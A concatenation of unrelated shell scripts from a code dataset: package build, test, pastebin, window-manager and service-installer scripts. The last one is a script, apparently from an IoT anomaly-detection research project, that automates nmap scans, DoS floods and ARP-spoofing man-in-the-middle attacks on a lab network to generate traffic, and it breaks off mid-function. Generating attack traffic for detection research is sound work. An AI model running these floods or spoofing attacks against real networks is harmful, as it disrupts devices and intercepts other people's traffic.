echo "Example: target-build.sh --src package_1.0-1.dsc --target lenny-i386 --repository main/p/package --output ~/tmp/20120628"
exit 1
}
# Parse the long options --src/--target/--repository/--output into the
# BUILD_SRC / BUILD_TARGET / BUILD_REPO_PATH / BUILD_OUTPUT globals.
# Commas inside --target are converted into spaces so the value can be
# iterated as a word list later.
# NOTE(review): "getopt -u" is the legacy unquoted mode and mangles
# arguments containing whitespace - acceptable here since all expected
# values are paths/target names without spaces.
parse_cmdline() {
if [ $# -eq 0 ]; then
show_usage
fi
set -- `getopt -u --longoptions="src: target: repository: output:" -- -- "$@"` || show_usage
while [ $# -gt 0 ]
do
case "$1" in
--src)
BUILD_SRC="$2"
shift
;;
--target)
# allow "a,b,c" as well as "a b c"
BUILD_TARGET=`echo "$2" | sed -e 's/,/\ /g'`
shift
;;
--repository)
BUILD_REPO_PATH="$2"
shift
;;
--output)
BUILD_OUTPUT="$2"
shift
;;
--)
shift
break
;;
*)
break
esac
shift
done
}
# Ensure the pbuilder config for one target exists and its base tarball
# is fresh; refresh the chroot when the tarball has not been updated in
# the last 7 days. Dies when the per-target config file is missing.
# Arguments: $1 - target name, e.g. "buster-amd64"
check_target_chroot() {
  local target="$1"
  if [ ! -f "/etc/pbuilder/$target" ]; then
    die "Unable to find pbuilder config for target: $target"
  fi
  # Check if target not updated for 7 days and update it
  if [ "$(find "/var/cache/pbuilder/base-${target}.tgz" -type f -mtime -7 | wc -l)" = 0 ]; then
    echo "Target $target not updated last 7 days - updating it"
    sudo pbuilder --update --override-config --configfile "/etc/pbuilder/$target" || echo "Failed to update target: $target"
  fi
}
# Validate the mandatory command line values, make sure every requested
# pbuilder chroot exists and is up to date, and create the output dir.
# Globals (read): BUILD_SRC BUILD_TARGET BUILD_REPO_PATH BUILD_OUTPUT
#                 SUPPORTED_TARGETS
do_all_preparations() {
  local targets t
  if [ ! -f "$BUILD_SRC" ]; then
    if [ ! -z "$BUILD_SRC" ]; then
      die "Unable to find file: $BUILD_SRC"
    else
      echo "You must provide path to DSC file"
      show_usage
    fi
  fi
  if [ -z "$BUILD_TARGET" ]; then
    echo "You must provide build target"
    show_usage
  fi
  if [ -z "$BUILD_REPO_PATH" ]; then
    echo "You must provide repository path where to store build results"
    show_usage
  fi
  if [ -z "$BUILD_OUTPUT" ]; then
    echo "You must provide repository output path"
    show_usage
  fi
  # "all" expands to every supported target; the two previously duplicated
  # loops are now a single pass over the resolved list.
  if [ "$BUILD_TARGET" = "all" ]; then
    targets="$SUPPORTED_TARGETS"
  else
    targets="$BUILD_TARGET"
  fi
  for t in $targets; do
    check_target_chroot "$t"
  done
  mkdir -p "$BUILD_OUTPUT"
  if [ ! -d "$BUILD_OUTPUT" ]; then
    die "Unable to create output directory: $BUILD_OUTPUT"
  fi
}
# Build $BUILD_SRC for a single pbuilder target and move the produced
# artefacts into "$BUILD_OUTPUT/<dist>/$BUILD_REPO_PATH".
# Arguments: $1 - target name, e.g. "buster-amd64"
# Globals:   reads BUILD_SRC, BUILD_OUTPUT, BUILD_REPO_PATH;
#            sets UNCLEAN_BUILD=1 on build failure (does not abort).
build_single_target() {
  local TARGET
  TARGET="$1"
  find /var/cache/pbuilder/result-$TARGET/ -type f -delete 2>/dev/null || die "Unable to cleanup pbuilder results directory: /var/cache/pbuilder/result-$TARGET"
  sudo pbuilder --build --configfile "/etc/pbuilder/$TARGET" "$BUILD_SRC"
  if [ $? != 0 ]; then
    warn "Failed to build $(basename $BUILD_SRC) for target $TARGET"
    UNCLEAN_BUILD=1
  else
    # BUG FIX: derive the distribution from the function argument $TARGET
    # instead of the caller's loop variable $i (which only worked by
    # accident); strip the arch suffix with parameter expansion rather
    # than "perl -pi" on stdin (-i is meaningless without a file).
    DIST=${TARGET%-i386}
    DIST=${DIST%-amd64}
    mkdir -p "$BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH"
    if [ ! -d "$BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH" ]; then
      die "Unable to create output directory: $BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH"
    fi
    # keep .changes files out of the repository tree
    find /var/cache/pbuilder/result-$TARGET/ -type f ! -name '*.changes' -print0 | xargs -r0 mv -f -t "$BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH"
    find /var/cache/pbuilder/result-$TARGET/ -type f -delete 2>/dev/null || die "Unable to cleanup pbuilder results directory: /var/cache/pbuilder/result-$TARGET"
  fi
}
# Build every supported target in sequence.
# NOTE(review): the loop variable "i" is intentionally global - the
# original build_single_target reads $i internally, so it must not be
# renamed or made local here.
build_all_targets() {
for i in $SUPPORTED_TARGETS
do
build_single_target "$i"
done
}
# --- main flow: parse options, prepare chroots, build, report ---
parse_cmdline "$@"
do_all_preparations
if [ "$BUILD_TARGET" = "all" ]; then
build_all_targets
else
# global loop variable "i" on purpose - see build_all_targets
for i in $BUILD_TARGET
do
build_single_target "$i"
done
fi
# exit 2 distinguishes "some builds failed" from hard errors (exit 1)
if [ "$UNCLEAN_BUILD" -eq 1 ]; then
warn "One or more targets were not built"
exit 2
fi
| true
|
a71fb4bf3f74008457748c021da7cd1a3a76b489
|
Shell
|
Hazelfire/Haskell-OpenAPI-Client-Code-Generator
|
/.circleci/test_golden
|
UTF-8
| 945
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Golden test for the OpenAPI code generator: regenerate from the spec
# and diff against the committed expected output (or refresh it with
# "update" as the first argument).
set -e
actualDir=actual
expectedDir=expected
# seed the stack snapshot cache from a pre-built snapshot if available;
# failures here are non-fatal (|| true)
[[ -d /root/.stack/snapshots/x86_64-linux/d2f1d79601122b1003c68e260f770c1d32d5fe7a028973b8192e738556d0b8b3 ]] && cp -Rn /root/.stack/snapshots/x86_64-linux/d2f1d79601122b1003c68e260f770c1d32d5fe7a028973b8192e738556d0b8b3 /root/.stack/snapshots/x86_64-linux/711b0e993dd52035c0641daec2c20681935ad613e80e3462008d52395107852b || true
GENERATOR_EXE=$(stack path --local-install-root)/bin/openapi3-code-generator-exe
cd .circleci/golden
specification=z_complex_self_made_example.yml
if [[ $1 == "update" ]]; then
# regenerate the golden "expected" output in place
echo "Update expected directory"
printf "\n-------------------------\n\n"
$GENERATOR_EXE "../specifications/$specification" --output-dir=$expectedDir --force
else
# normal run: regenerate into "actual" and fail on any diff (set -e)
$GENERATOR_EXE "../specifications/$specification" --output-dir=$actualDir --force
printf "\n-------------------------\n\n"
diff -r $actualDir $expectedDir
fi
printf "\n-------------------------\n\n"
| true
|
038c1bb89eedae71ebfd4c333dc7e587c9deb27c
|
Shell
|
hlecuanda/zconf
|
/local.d/UserPrefs/functions/ixng.zsh
|
UTF-8
| 1,666
| 3.234375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/usr/bin/env zsh
# _ _
# (_)_ __ (_) ___
# | \ \/ / | |/ _ \
# | |> < _| | (_) |
# |_/_/\_(_)_|\___/
# h@h-lo.me 20190927 144132 -0700 PDT 1569620492 d(-_- )b...
# Zsh implementation of the ix.io pastebin client. Now does more shit
# than the bash version ftw!
#
local opts
local OPTIND
setopt localoptions shwordsplit
# use ~/.netrc credentials when present
[[ -f "$HOME/.netrc" ]] && opts='-n'
# render listings through w3m when installed, fall back to plain cat
(( $+commands[w3m] )) && alias w="$(which w3m)" || alias w='cat -'
while getopts ":hlo:d:i:n:u:" x; do
case $x in
d) curl $opts -X DELETE ix.io/$OPTARG; return;;
i) opts="$opts -X PUT" ; local id="$OPTARG";;
n) opts="$opts -F read:1=$OPTARG";;
# NOTE(review): "-o" takes an output filename, so "-X" is consumed as
# that filename here - looks like a bug; verify intended curl usage
o) curl $opts -o -X GET ix.io/$OPTARG; return;;
l) w ix.io/user/ ; return;;
u) w ix.io/user/$OPTARG ; return;;
h|*) cat <<- EOF ; return ;;
usage:
ix hello.txt # paste file (name/ext will be set).
echo Hello world. | ix # read from STDIN (won't set name/ext).
ix -n 1 self_destruct.txt # paste will be deleted after one read.
ix -i ID hello.txt # replace ID, if you have permission.
ix -o ID # print contents of ID as output
ix -d ID # delete ID, if you have permission.
ix -u USER # list pastes for USER
ix -l # list the last 100 pastes
EOF
esac
done
shift $(($OPTIND - 1))
# interactive stdin: either upload the named file, or prompt for input
[[ -t 0 ]] && {
local filename="$1"
shift
[[ -n "$filename" ]] && {
curl $opts -F f:1=@"$filename" $* ix.io/$id
return
}
echo "^C to cancel, ^D to send."
}
# default path: pipe stdin to ix.io (optionally replacing paste $id)
curl ${(Q)opts} -F f:1='<-' $* ix.io/$id
[[ -o verbose ]] && unsetopt verbose xtrace sourcetrace || :
# vim: set ft=zsh sw=2 tw=0 fdm=manual et :
| true
|
b5d4e773b56c7be914d081bf2865229811678e33
|
Shell
|
arturomunoztolosa-bc/ksz9897_workaround
|
/setup_fixup.sh
|
UTF-8
| 2,076
| 4.15625
| 4
|
[] |
no_license
|
#! /bin/bash
# Source locations of the systemd unit and the python fixup script.
SERVICE_FILE="./workarounds/ksz9897r-rev.A1-fixup.service"
FIXUP_FILE="./workarounds/ksz9897r-rev.A1-fixup.py"
# Install destinations.
SERVICE_DST_DIR="/etc/systemd/system/"
# NOTE(review): "ksz9787" differs from the "ksz9897" chip name used
# everywhere else - possible digit-swap typo; verify the service unit's
# ExecStart path before changing it.
FIXUP_DST_DIR="/etc/ksz9787_revA1_fixup"
# Install a Debian package via apt-get unless dpkg already reports it
# as "install ok installed".
# Arguments: $1 - package name
check_or_install_pkg() {
  local required_pkg="$1"
  local pkg_ok
  # Declaration split from assignment so the pipeline status is not
  # masked by "local"; dpkg-query's stderr is silenced because it
  # complains loudly about packages it has never seen.
  pkg_ok=$(dpkg-query -W --showformat='${Status}\n' "$required_pkg" 2>/dev/null | grep "install ok installed")
  echo "Checking for $required_pkg: $pkg_ok"
  if [ -z "$pkg_ok" ]; then
    echo "No $required_pkg. Installing required dependecy."
    apt-get --force-yes --yes install "$required_pkg"
  fi
}
# Install and enable the fixup systemd service if it is not present yet;
# enable it if present but disabled; do nothing when already enabled.
# Arguments:
#   $1 - path to the .service unit file in the repo
#   $2 - path to the fixup script in the repo
#   $3 - destination directory for the unit file (systemd unit dir)
#   $4 - destination directory for the fixup script
check_or_setup_fixup_service() {
local service_path=$1
local fixup_path=$2
local service_dst_dir=$3
local fixup_dst_dir=$4
local service_file=$(basename -- "${service_path}")
local fixup_file=$(basename -- "${fixup_path}")
# second column of "systemctl list-unit-files" is the enablement state;
# empty means the unit is not installed at all
local status=$(systemctl list-unit-files | grep ${service_file} | awk '{print $2}')
if [ "" == "${status}" ]; then
# (message presumably means "does not exist")
echo "${service_file} does not exit. Installing service."
# install service unit file
cp ${service_path} ${service_dst_dir}
systemctl enable ${service_file}
# install fixup sciript in known place
mkdir -p ${fixup_dst_dir}
cp ${fixup_path} ${fixup_dst_dir}
chmod +x ${fixup_dst_dir}/${fixup_file}
echo "${service_file} is installed. Reboot is required to apply it."
elif [ "disabled" == "$status" ]; then
echo "${service_file} is disabled. Enable service."
systemctl enable ${service_file}
echo "${service_file} is enabled. Reboot is required to apply it."
else
echo "${service_file} is enabled"
fi
}
# --- main flow: require root, require repo root as cwd, then install ---
if ! [ $(id -u) = 0 ]; then
echo "run script as root"
exit 1
fi
if ! [ -d "workarounds" ]; then
echo "run script from git root directory"
exit 1
fi
# install required dependency (the fixup script drives the switch over i2c)
check_or_install_pkg "i2c-tools"
# setup systemd service to apply workaround on each boot
# and before network service
check_or_setup_fixup_service $SERVICE_FILE $FIXUP_FILE $SERVICE_DST_DIR $FIXUP_DST_DIR
| true
|
a8a3904d16162a7a7c48077468eeba882a250bf4
|
Shell
|
rushioda/PIXELVALID_athena
|
/athena/HLT/HLTTestApps/python/tests/test_lib.sh
|
UTF-8
| 846
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# author Andre Anjos <andre.dos.anjos@cern.ch>
# author Ricardo Abreu <ricardo.abreu@cern.ch>
# directory containing this script, resolved with symlinks followed (-P)
thisdir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd -P )"
# the python test modules live next to this script in ../HLTTestApps
testdir="$thisdir/../HLTTestApps"
echo $testdir
# Run one python test module from $testdir, print banner and status, and
# abort the whole script with the test's exit code on failure.
function runtest()
{
  local status
  printf '\n===============================================================\n'
  printf 'Running %s tests\n' "$*"
  printf '===============================================================\n\n'
  python "$testdir/$@"
  status=$?
  printf '\n============================================\n'
  printf 'The status output of this set of tests is %s\n' "$status"
  printf '============================================\n\n'
  if [ "$status" -ne 0 ]; then
    exit "$status"
  fi
}
# python test modules to run, in order; runtest aborts on first failure
targets=( "option.py" "pausable_istream.py" "configuration.py" "infrastructure.py" "online_infrastructure.py" "processor.py")
for tgt in "${targets[@]}"
do
runtest $tgt
done
| true
|
04b9b0bb09a63211a5e64bf575b94fa48477e967
|
Shell
|
LigeiramenteDesidratado/config
|
/.local/bin/winspawn
|
UTF-8
| 717
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
# Show (or spawn, then show) a named sway scratchpad terminal running $1.
# Use -n= to give a name
[ -z "$1" ] && exit
# default instance name is the command itself
PNAME=$1
POSITIONAL=()
# NOTE(review): this loop iterates the pre-expanded "$@" via $i but
# appends/consumes via "$1"+shift - it works for the expected
# "[-n=name] cmd args..." invocations, but mixing the two is fragile;
# verify before extending the option handling.
for i in "$@"
do
case $i in
-n=*|--name=*)
PNAME="${i#*=}"
shift
;;
*)
POSITIONAL+=("$1")
shift
;;
esac
done
set -- "${POSITIONAL[@]}"
# sway window with instance "$1" already exists?
if xwininfo -tree -root | grep "(\"$1\" ";
then
echo "Window detected."
else
echo "Window not detected... spawning."
# spawn $TERMINAL with instance name $PNAME running "$1" (+ extra args),
# then immediately surface it from the scratchpad, centered
swaymsg "exec --no-startup-id $TERMINAL -n $PNAME $(echo "${@:2}") -e $1 " && swaymsg "[instance=\"$PNAME\"] scratchpad show; [instance=\"$PNAME\"] move position center"
sleep .25 # This sleep is my laziness, will fix later (needed for immediate appearance after spawn).
fi
swaymsg "[instance=\"$PNAME\"] scratchpad show; [instance=\"$PNAME\"] move position center"
| true
|
1dc3822eb1e2f62f7042c545c49d7e047fc981b5
|
Shell
|
forkkit/br
|
/tests/br_rawkv/run.sh
|
UTF-8
| 1,792
| 2.703125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#
# Copyright 2019 PingCAP, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# See the License for the specific language governing permissions and
# limitations under the License.
set -eu
BACKUP_DIR="raw_backup"
# generate raw kv randomly in range[start-key, end-key) in 10s
bin/rawkv --pd $PD_ADDR --mode rand-gen --start-key 31 --end-key 3130303030303030 --duration 10
# output checksum of the generated data (third field of the "result" line)
bin/rawkv --pd $PD_ADDR --mode checksum --start-key 31 --end-key 3130303030303030 > /$TEST_DIR/checksum.out
checksum_ori=$(grep result /$TEST_DIR/checksum.out | awk '{print $3}')
# backup rawkv
echo "backup start..."
run_br --pd $PD_ADDR backup raw -s "local://$TEST_DIR/$BACKUP_DIR" --start 31 --end 3130303030303030 --format hex --concurrency 4
# delete data in range[start-key, end-key)
bin/rawkv --pd $PD_ADDR --mode delete --start-key 31 --end-key 3130303030303030
# TODO: Finish check after restore ready
# restore rawkv
# echo "restore start..."
# run_br --pd $PD_ADDR restore raw -s "local://$TEST_DIR/$BACKUP_DIR" --start 31 --end 3130303030303030 --format hex --concurrency 4
# output checksum after restore
# bin/rawkv --pd $PD_ADDR --mode checksum --start-key 31 --end-key 3130303030303030 > /$TEST_DIR/checksum.out
checksum_new=$(grep result /$TEST_DIR/checksum.out | awk '{print $3}')
# BUG FIX: '==' is a bashism; under the #!/bin/sh shebang (e.g. dash)
# POSIX test(1) only supports '=' for string comparison.
if [ "$checksum_ori" = "$checksum_new" ];then
echo "TEST: [$TEST_NAME] successed!"
else
echo "TEST: [$TEST_NAME] failed!"
exit 1
fi
| true
|
4431d169dd28ca63b5820255bcfbbcd67fc4aac0
|
Shell
|
slowinskami/project-IoT_anomaly_detection
|
/ATTACKS/attack_scripts/automate_scenarios.sh
|
UTF-8
| 27,039
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
# PID of this script (kept for reference/cleanup)
me=$$
# iteration counter; presumably incremented by the main loop further down - verify
i=0
: 'Scenario 1 : network scanning
This scenario represents the pure reconnaissance attack in which the attacker wants to simply acquire information about the hosts on the network.
In this scenario, we assume that the attacker is already connected to the targeted network and that the attacker knows the subnet that he wants to scan.
The attacker will usually commence his reconnaissance with a quick scan. This is done to just quickly scan the network, identifying which hosts are present on the network and acquiring information on potential hints on where to search for further vulnerabilities / plan further scans / plan next attack actions or simply acquire general information without leaving much footprint on the network to potentially resume his actions later.
After performing a quick scan, the attacker might also want to perform a long, in-depth scan of the network to identify further vulnerabilities (that might have not been found in the initial quick scan). Likewise, the attacker might want to target specific hosts rather than targeting the whole range on the subnet. The latter is not included in automation but might be configured manually in the script if needed by altering the list of long scans defined in the main loop.
This script performs the quick scan by choosing one random scan from the list of quick scans (arrQUICK) defined in the main loop. Then it proceeds to the long scan with probability 0.5. If proceeding to the long scan, the next scan is chosen randomly from the list of long scans (arrLONG) defined in the main loop.
This attack scenario:
- picks a random quick scan from the list specified in the main loop (arrQUICK)
- performs the quick scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- terminates or proceeds to the long scan with probability 0.5
- picks a random long scan from the list specified in the main loop (arrLONG)
- performs the long scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- saves terminal output to scenarios_output/scenarios_terminal_output.txt
- saves summaries/logs attack details in scenarios_output/scenarios_log.txt'
#######################################
# Scenario 1: pure network scanning (reconnaissance).
# Arguments: $1 - iteration number (logging only)
# Globals:   reads arrQUICK/arrLONG (scan command lists defined in the
#            main loop); appends to scenarios_output/ log files.
# Runs a random quick nmap scan, then with probability 0.5 also a random
# long scan after a random 1s-2min "analysis" pause.
#######################################
function scenario1 {
i=$1
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:1 = Scanning\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
# pick random quick scan from arrQUICK (reseed RANDOM from pid + time)
RANDOM=$$$(date +%s)
Random_QUICK=${arrQUICK[$RANDOM % ${#arrQUICK[@]} ]}
# perform quick scan
start_quick=$(date "+%Y.%m.%d-%H.%M.%S")
printf " A) Nmap quick scan\n *$start_quick : $Random_QUICK\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_QUICK)
stop_quick=$(date "+%Y.%m.%d-%H.%M.%S")
# pick random long scan (regular or intense) from arrLONG
RANDOM=$$$(date +%s)
Random_LONG=${arrLONG[$RANDOM % ${#arrLONG[@]} ]}
# decide with probability 0.5 whether to do a further long scan
rand=$(shuf -i1-2 -n1)
if [ "$rand" = "1" ]; then
# performing a long scan after a random pause (1 sec to 2 mins - time for scan analysis)
rand=$(shuf -i1-120 -n1)
# BUG FIX: the original printed malformed "/n" escapes and never actually
# slept; pause for the chosen interval as the comment intended.
printf "\nrandom is : %s\n" "$rand"
sleep "$rand"
start_long=$(date "+%Y.%m.%d-%H.%M.%S")
printf " B) Nmap long scan\n *$start_long : $Random_LONG" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_LONG)
stop_long=$(date "+%Y.%m.%d-%H.%M.%S")
else
# not performing a long scan
Random_LONG="not applicable"
start_long="not applicable"
stop_long="not applicable"
fi
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
# summary: id, scenario, start/stop, plus details of both scans
printf "\n\n$1) Scenario 1 \n *start: $start_current_time \n *stop: $stop_current_time \n *executed: \n **$Random_QUICK \n ***start: $start_quick\n ***stop: $stop_quick\n **$Random_LONG \n ***start: $start_long\n ***stop: $stop_long\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
: 'Scenario 2 : Network scanning + denial(s) of service
This scenario represents a quick reconnaissance followed by one (or more) of the most popular denial of service attacks. The attacker in this scenario performs a quick scanning (with one of the most popular nmap scans) to acquire information about the hosts present on the network as well as to discover information on open ports or other vulnerabilities.
After performing a quick scan, the attacker applies one of the most popular/standard DoS floods on one of the target devices. The attacker might try one or more floods on the same device, one flood on all devices or a mix of floods on a mix of devices.
This script performs the quick scan by choosing one random scan from the list of quick scans (arrQUICK) defined in the main loop. After that, a random number of denial of service attempts is picked. In this case the rationale is that there are six devices on the network so the random number of iterations is between 1 and 6 (inclusive) but this could be altered to cater for specific needs/more devices. In each iteration of the DoS loop, a script will wait for a random amount of time from 1 second to 2 minutes (as the attacker might not execute the scanning and DoS one after another (especially if performing these manually, not in the the script). After that, random DoS attack is chosen fromt he list of most popular DoS attacks defined in the main script execution loop (arrDOS). A random IP is chosen from the IPs list defined at the beginning of script execution. This IP will be the target of the DoS attack.
This attack scenario:
- picks a random quick scan from the list specified in the main loop (arrQUICK)
- performs the quick scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- chooses random amount of repetitions of the DoS attack (from 1 to 6)
- in each iteration of the loop:
- sleeps random amount of time (from 1 second to 2 minutes)
- picks a random DoS attack from the list specified in the main loop (arrDOS)
- performs the DoS attack as a background process
- randomly picks the duration of the DoS (from 30 seconds to 5 minutes)
- kills the background process with the DoS after the previously selected random duration time
- saves terminal output to scenarios_output/scenarios_terminal_output.txt
- saves summaries/logs attack details in scenarios_output/scenarios_log.txt
mental notes:
- go through the xml results and see what ports are open on each device - to justify the list of dos attacks chosen, the ones currently specified might seem a bit random, would be much better if I could adjust them to the identified vulnerabilities.
- shall I run the dos as nohup instead? verify - test thoroughly'
#######################################
# Scenario 2: quick scan followed by 1-6 denial-of-service floods.
# Arguments: $1 - iteration number (logging only)
# Globals:   reads arrQUICK/arrDOS/arrIPS (defined in the main loop);
#            appends to scenarios_output/ log files.
#######################################
function scenario2 {
i=$1
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:2 = DoS\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#pick random quick scan from the quick scans list defined in arrQUICK in the main loop
RANDOM=$$$(date +%s)
Random_QUICK=${arrQUICK[$RANDOM % ${#arrQUICK[@]} ]}
#perform quick scan
start_quick=$(date "+%Y.%m.%d-%H.%M.%S")
printf "\n A) Nmap quick scan\n *$start_quick : $Random_QUICK\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_QUICK)
stop_quick=$(date "+%Y.%m.%d-%H.%M.%S")
#pick n repetitions of the Denial of Service (repetitions of DoS in general, not repetitions of one specific flood, flood chosen randomly)
rand_repetitions=$(shuf -i1-6 -n1) #1 to 6 as currently 6 devices - the attacker might want to try to flood all of them or less
# BUG FIX: the summary array was initialised as "performedDOS" but
# appended to / read as "performed_DOS", so entries accumulated across
# invocations; reset the array that is actually used.
performed_DOS=()
printf "\n\n DOS will be executed $rand_repetitions times...\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#execute the repeated denial of service
for (( c=1; c<=$rand_repetitions; c++ ))
do
#sleep for random amount of time (1 second to 2 minutes)
rand_sleep=$(shuf -i1-120 -n1)
printf "Sleeping for $rand_sleep seconds..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $rand_sleep
#pick random DoS attack from the arrDOS list defined in the main loop
RANDOM=$$$(date +%s)
Random_DOS=${arrDOS[$RANDOM % ${#arrDOS[@]} ]}
#pick random IP from the arrIPS identified at the beginning of the script execution
RANDOM=$$$(date +%s)
Random_IP=${arrIPS[$RANDOM % ${#arrIPS[@]} ]}
#perform the DoS attack for a random duration (30 seconds to 5 minutes)
start_DOS=$(date "+%Y.%m.%d-%H.%M.%S")
rand_duration=$(shuf -i30-300 -n1)
printf "\n B$c) DOS\n *$start_quick : $Random_DOS$Random_IP for $rand_duration seconds\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
# NOTE(review): the eval runs the flood inside a command substitution in
# a backgrounded job; $! is the job's pid, and killall hping3 is the
# backstop for any surviving flood children - verify if tools other than
# hping3 are added to arrDOS.
printf $(eval $Random_DOS$Random_IP) & scriptDOS=$! #run DoS as a background process
sleep $rand_duration
kill $scriptDOS
killall hping3 #to ensure that it was killed
stop_DOS=$(date "+%Y.%m.%d-%H.%M.%S")
performed_DOS+=("start: $start_DOS - stop: $stop_DOS - attack: $Random_DOS$Random_IP duration: $rand_duration seconds")
done
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
#print summary: scenario header plus one line per executed DoS
printf "\n\n$1) Scenario 2 \n *start: $start_current_time \n *stop: $stop_current_time \n *A)Nmap scanning: \n **$Random_QUICK \n ***start: $start_quick\n ***stop: $stop_quick\n *B)DoS: \n **iterations: $rand_repetitions\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf ' ***%s\n' "${performed_DOS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
: 'Scenario 3 : Network scanning + Man in the middle
This scenario represents a quick reconnaissance followed by a Man-In-The-Middle attack performed via ARP spoofing. The attacker in this scenario performs a quick scanning (with one of the most popular nmap scans) to acquire information about the hosts present on the network as well as to discover information on open ports or other vulnerabilities.
After performing a quick scan, the attacker performs one of the two variants of the arpspoof man-in-the-middle attacks: passive monitoring or packet injection. In passive monitoring, the attacker is simply sniffing on the network traffic between the router and the random target device. Packet injection variant involves an active attacker in which he is injecting ICMP packets. One of these two variants is chosen at random, each with 1/2 probability.
Potentially, other packets could be injected as well. For the time being, these are only ICMP packets. Packet injection is performed in send_ICMP.py script which uses scapy to craft and inject packets.
This attack scenario:
- picks a random quick scan from the list specified in the main loop (arrQUICK)
- performs the quick scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- waits random amount of time before embarking on the MITM attack (from 1 second to 2 minutes)
- picks random IP address to be the target of the attack (from the list of valid IP addresses defined in the main loop)
- randomly chooses one of the variants - passive monitoring or packet injection (1/2 probability each)
- sets up IP forwarding to enable MITM (to accept packets that are not destined at the attacker device)
- performs arpspoof on the victim and the router (tells victim that he is a router and tells router that he is a victim)
- depending on the variant chosen:
- for passive monitoring, starts tcpdump in the middle of the communication
- for packet injection:
- starts tcpdump in the middle of communication
- waits random time before injection of any packet from 10 seconds to 2 minutes
- picks random amount of packets to inject
- after each injection it sleeps for random duration from 1 second to 1 minute
- waits random time after injection of all packets is finished from 10 seconds to 2 minutes
- kills all arpspoof/tcpdump processes running
- disables IP forwarding
- saves terminal output to scenarios_output/scenarios_terminal_output.txt
- saves summaries/logs attack details in scenarios_output/scenarios_log.txt'
function scenario3 {
# Scenario 3: quick nmap reconnaissance followed by an ARP-spoofing MITM
# attack, either passive sniffing or active ICMP packet injection (1/2 each).
# Arguments:
#   $1 - iteration number (used in log lines and pcap file names)
#   $2 - space-separated list of candidate victim IP addresses
# Side effects: toggles kernel IP forwarding, runs arpspoof/tcpdump in the
# background (killed during teardown), writes pcaps and appends to logs.
i=$1
router="192.168.200.1"
Arpspoof="nohup arpspoof -i wlan0 -t " #nohup to run it in the background
sep=" "
noout=" &>/dev/null &"
Inject_packet="python send_ICMP.py "
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:3 = MITM\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#pick random quick scan from the quick scans list defined in arrQUICK in the main loop
# Re-seed RANDOM from PID+epoch so picks differ between runs.
RANDOM=$$$(date +%s)
Random_QUICK=${arrQUICK[$RANDOM % ${#arrQUICK[@]} ]}
#perform quick scan
start_quick=$(date "+%Y.%m.%d-%H.%M.%S")
printf "\n A) Nmap quick scan\n *$start_quick : $Random_QUICK\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_QUICK)
stop_quick=$(date "+%Y.%m.%d-%H.%M.%S")
#random wait time
rand_sleep=$(shuf -i1-120 -n1) #choose 1 second to 2 minutes
printf "Sleeping for $rand_sleep seconds ... " 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $rand_sleep
#pick random IP from the arrIPS identified at the beginning of the script execution
RANDOM=$$$(date +%s)
# Re-split $2 into an array of victim IPs (word-splitting is intended here).
arrIPS=($2)
printf "\nChecking on arrIPS ...\n"
printf ' *%s\n' "${arrIPS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
Random_IP=${arrIPS[$RANDOM % ${#arrIPS[@]} ]}
#probability passive monitoring vs packet injection
rand_probability=$(shuf -i1-2 -n1) #choose 1 of he two attacks with probability 1/2 of passive monitoring and 1/2 of packet injection
start_MITM=$(date "+%Y.%m.%d-%H.%M.%S")
rand_duration=$(shuf -i30-300 -n1) #execute dos for random time from 30 seconds to 5 minutes??????????????????????????????????????????????? is it used ?????????????????
# NOTE(review): rand_duration above is never referenced again in this
# function — confirm whether it should bound the MITM duration.
#set up IP forwarding
printf "\nSetting IP forwarding..."
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
#Arpspoof the victim (target's IP)
printf "\nExecuting : $Arpspoof$Random_IP$sep$router$noout\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $Arpspoof$Random_IP$sep$router$noout)
#Arpspoof the router (router's IP)
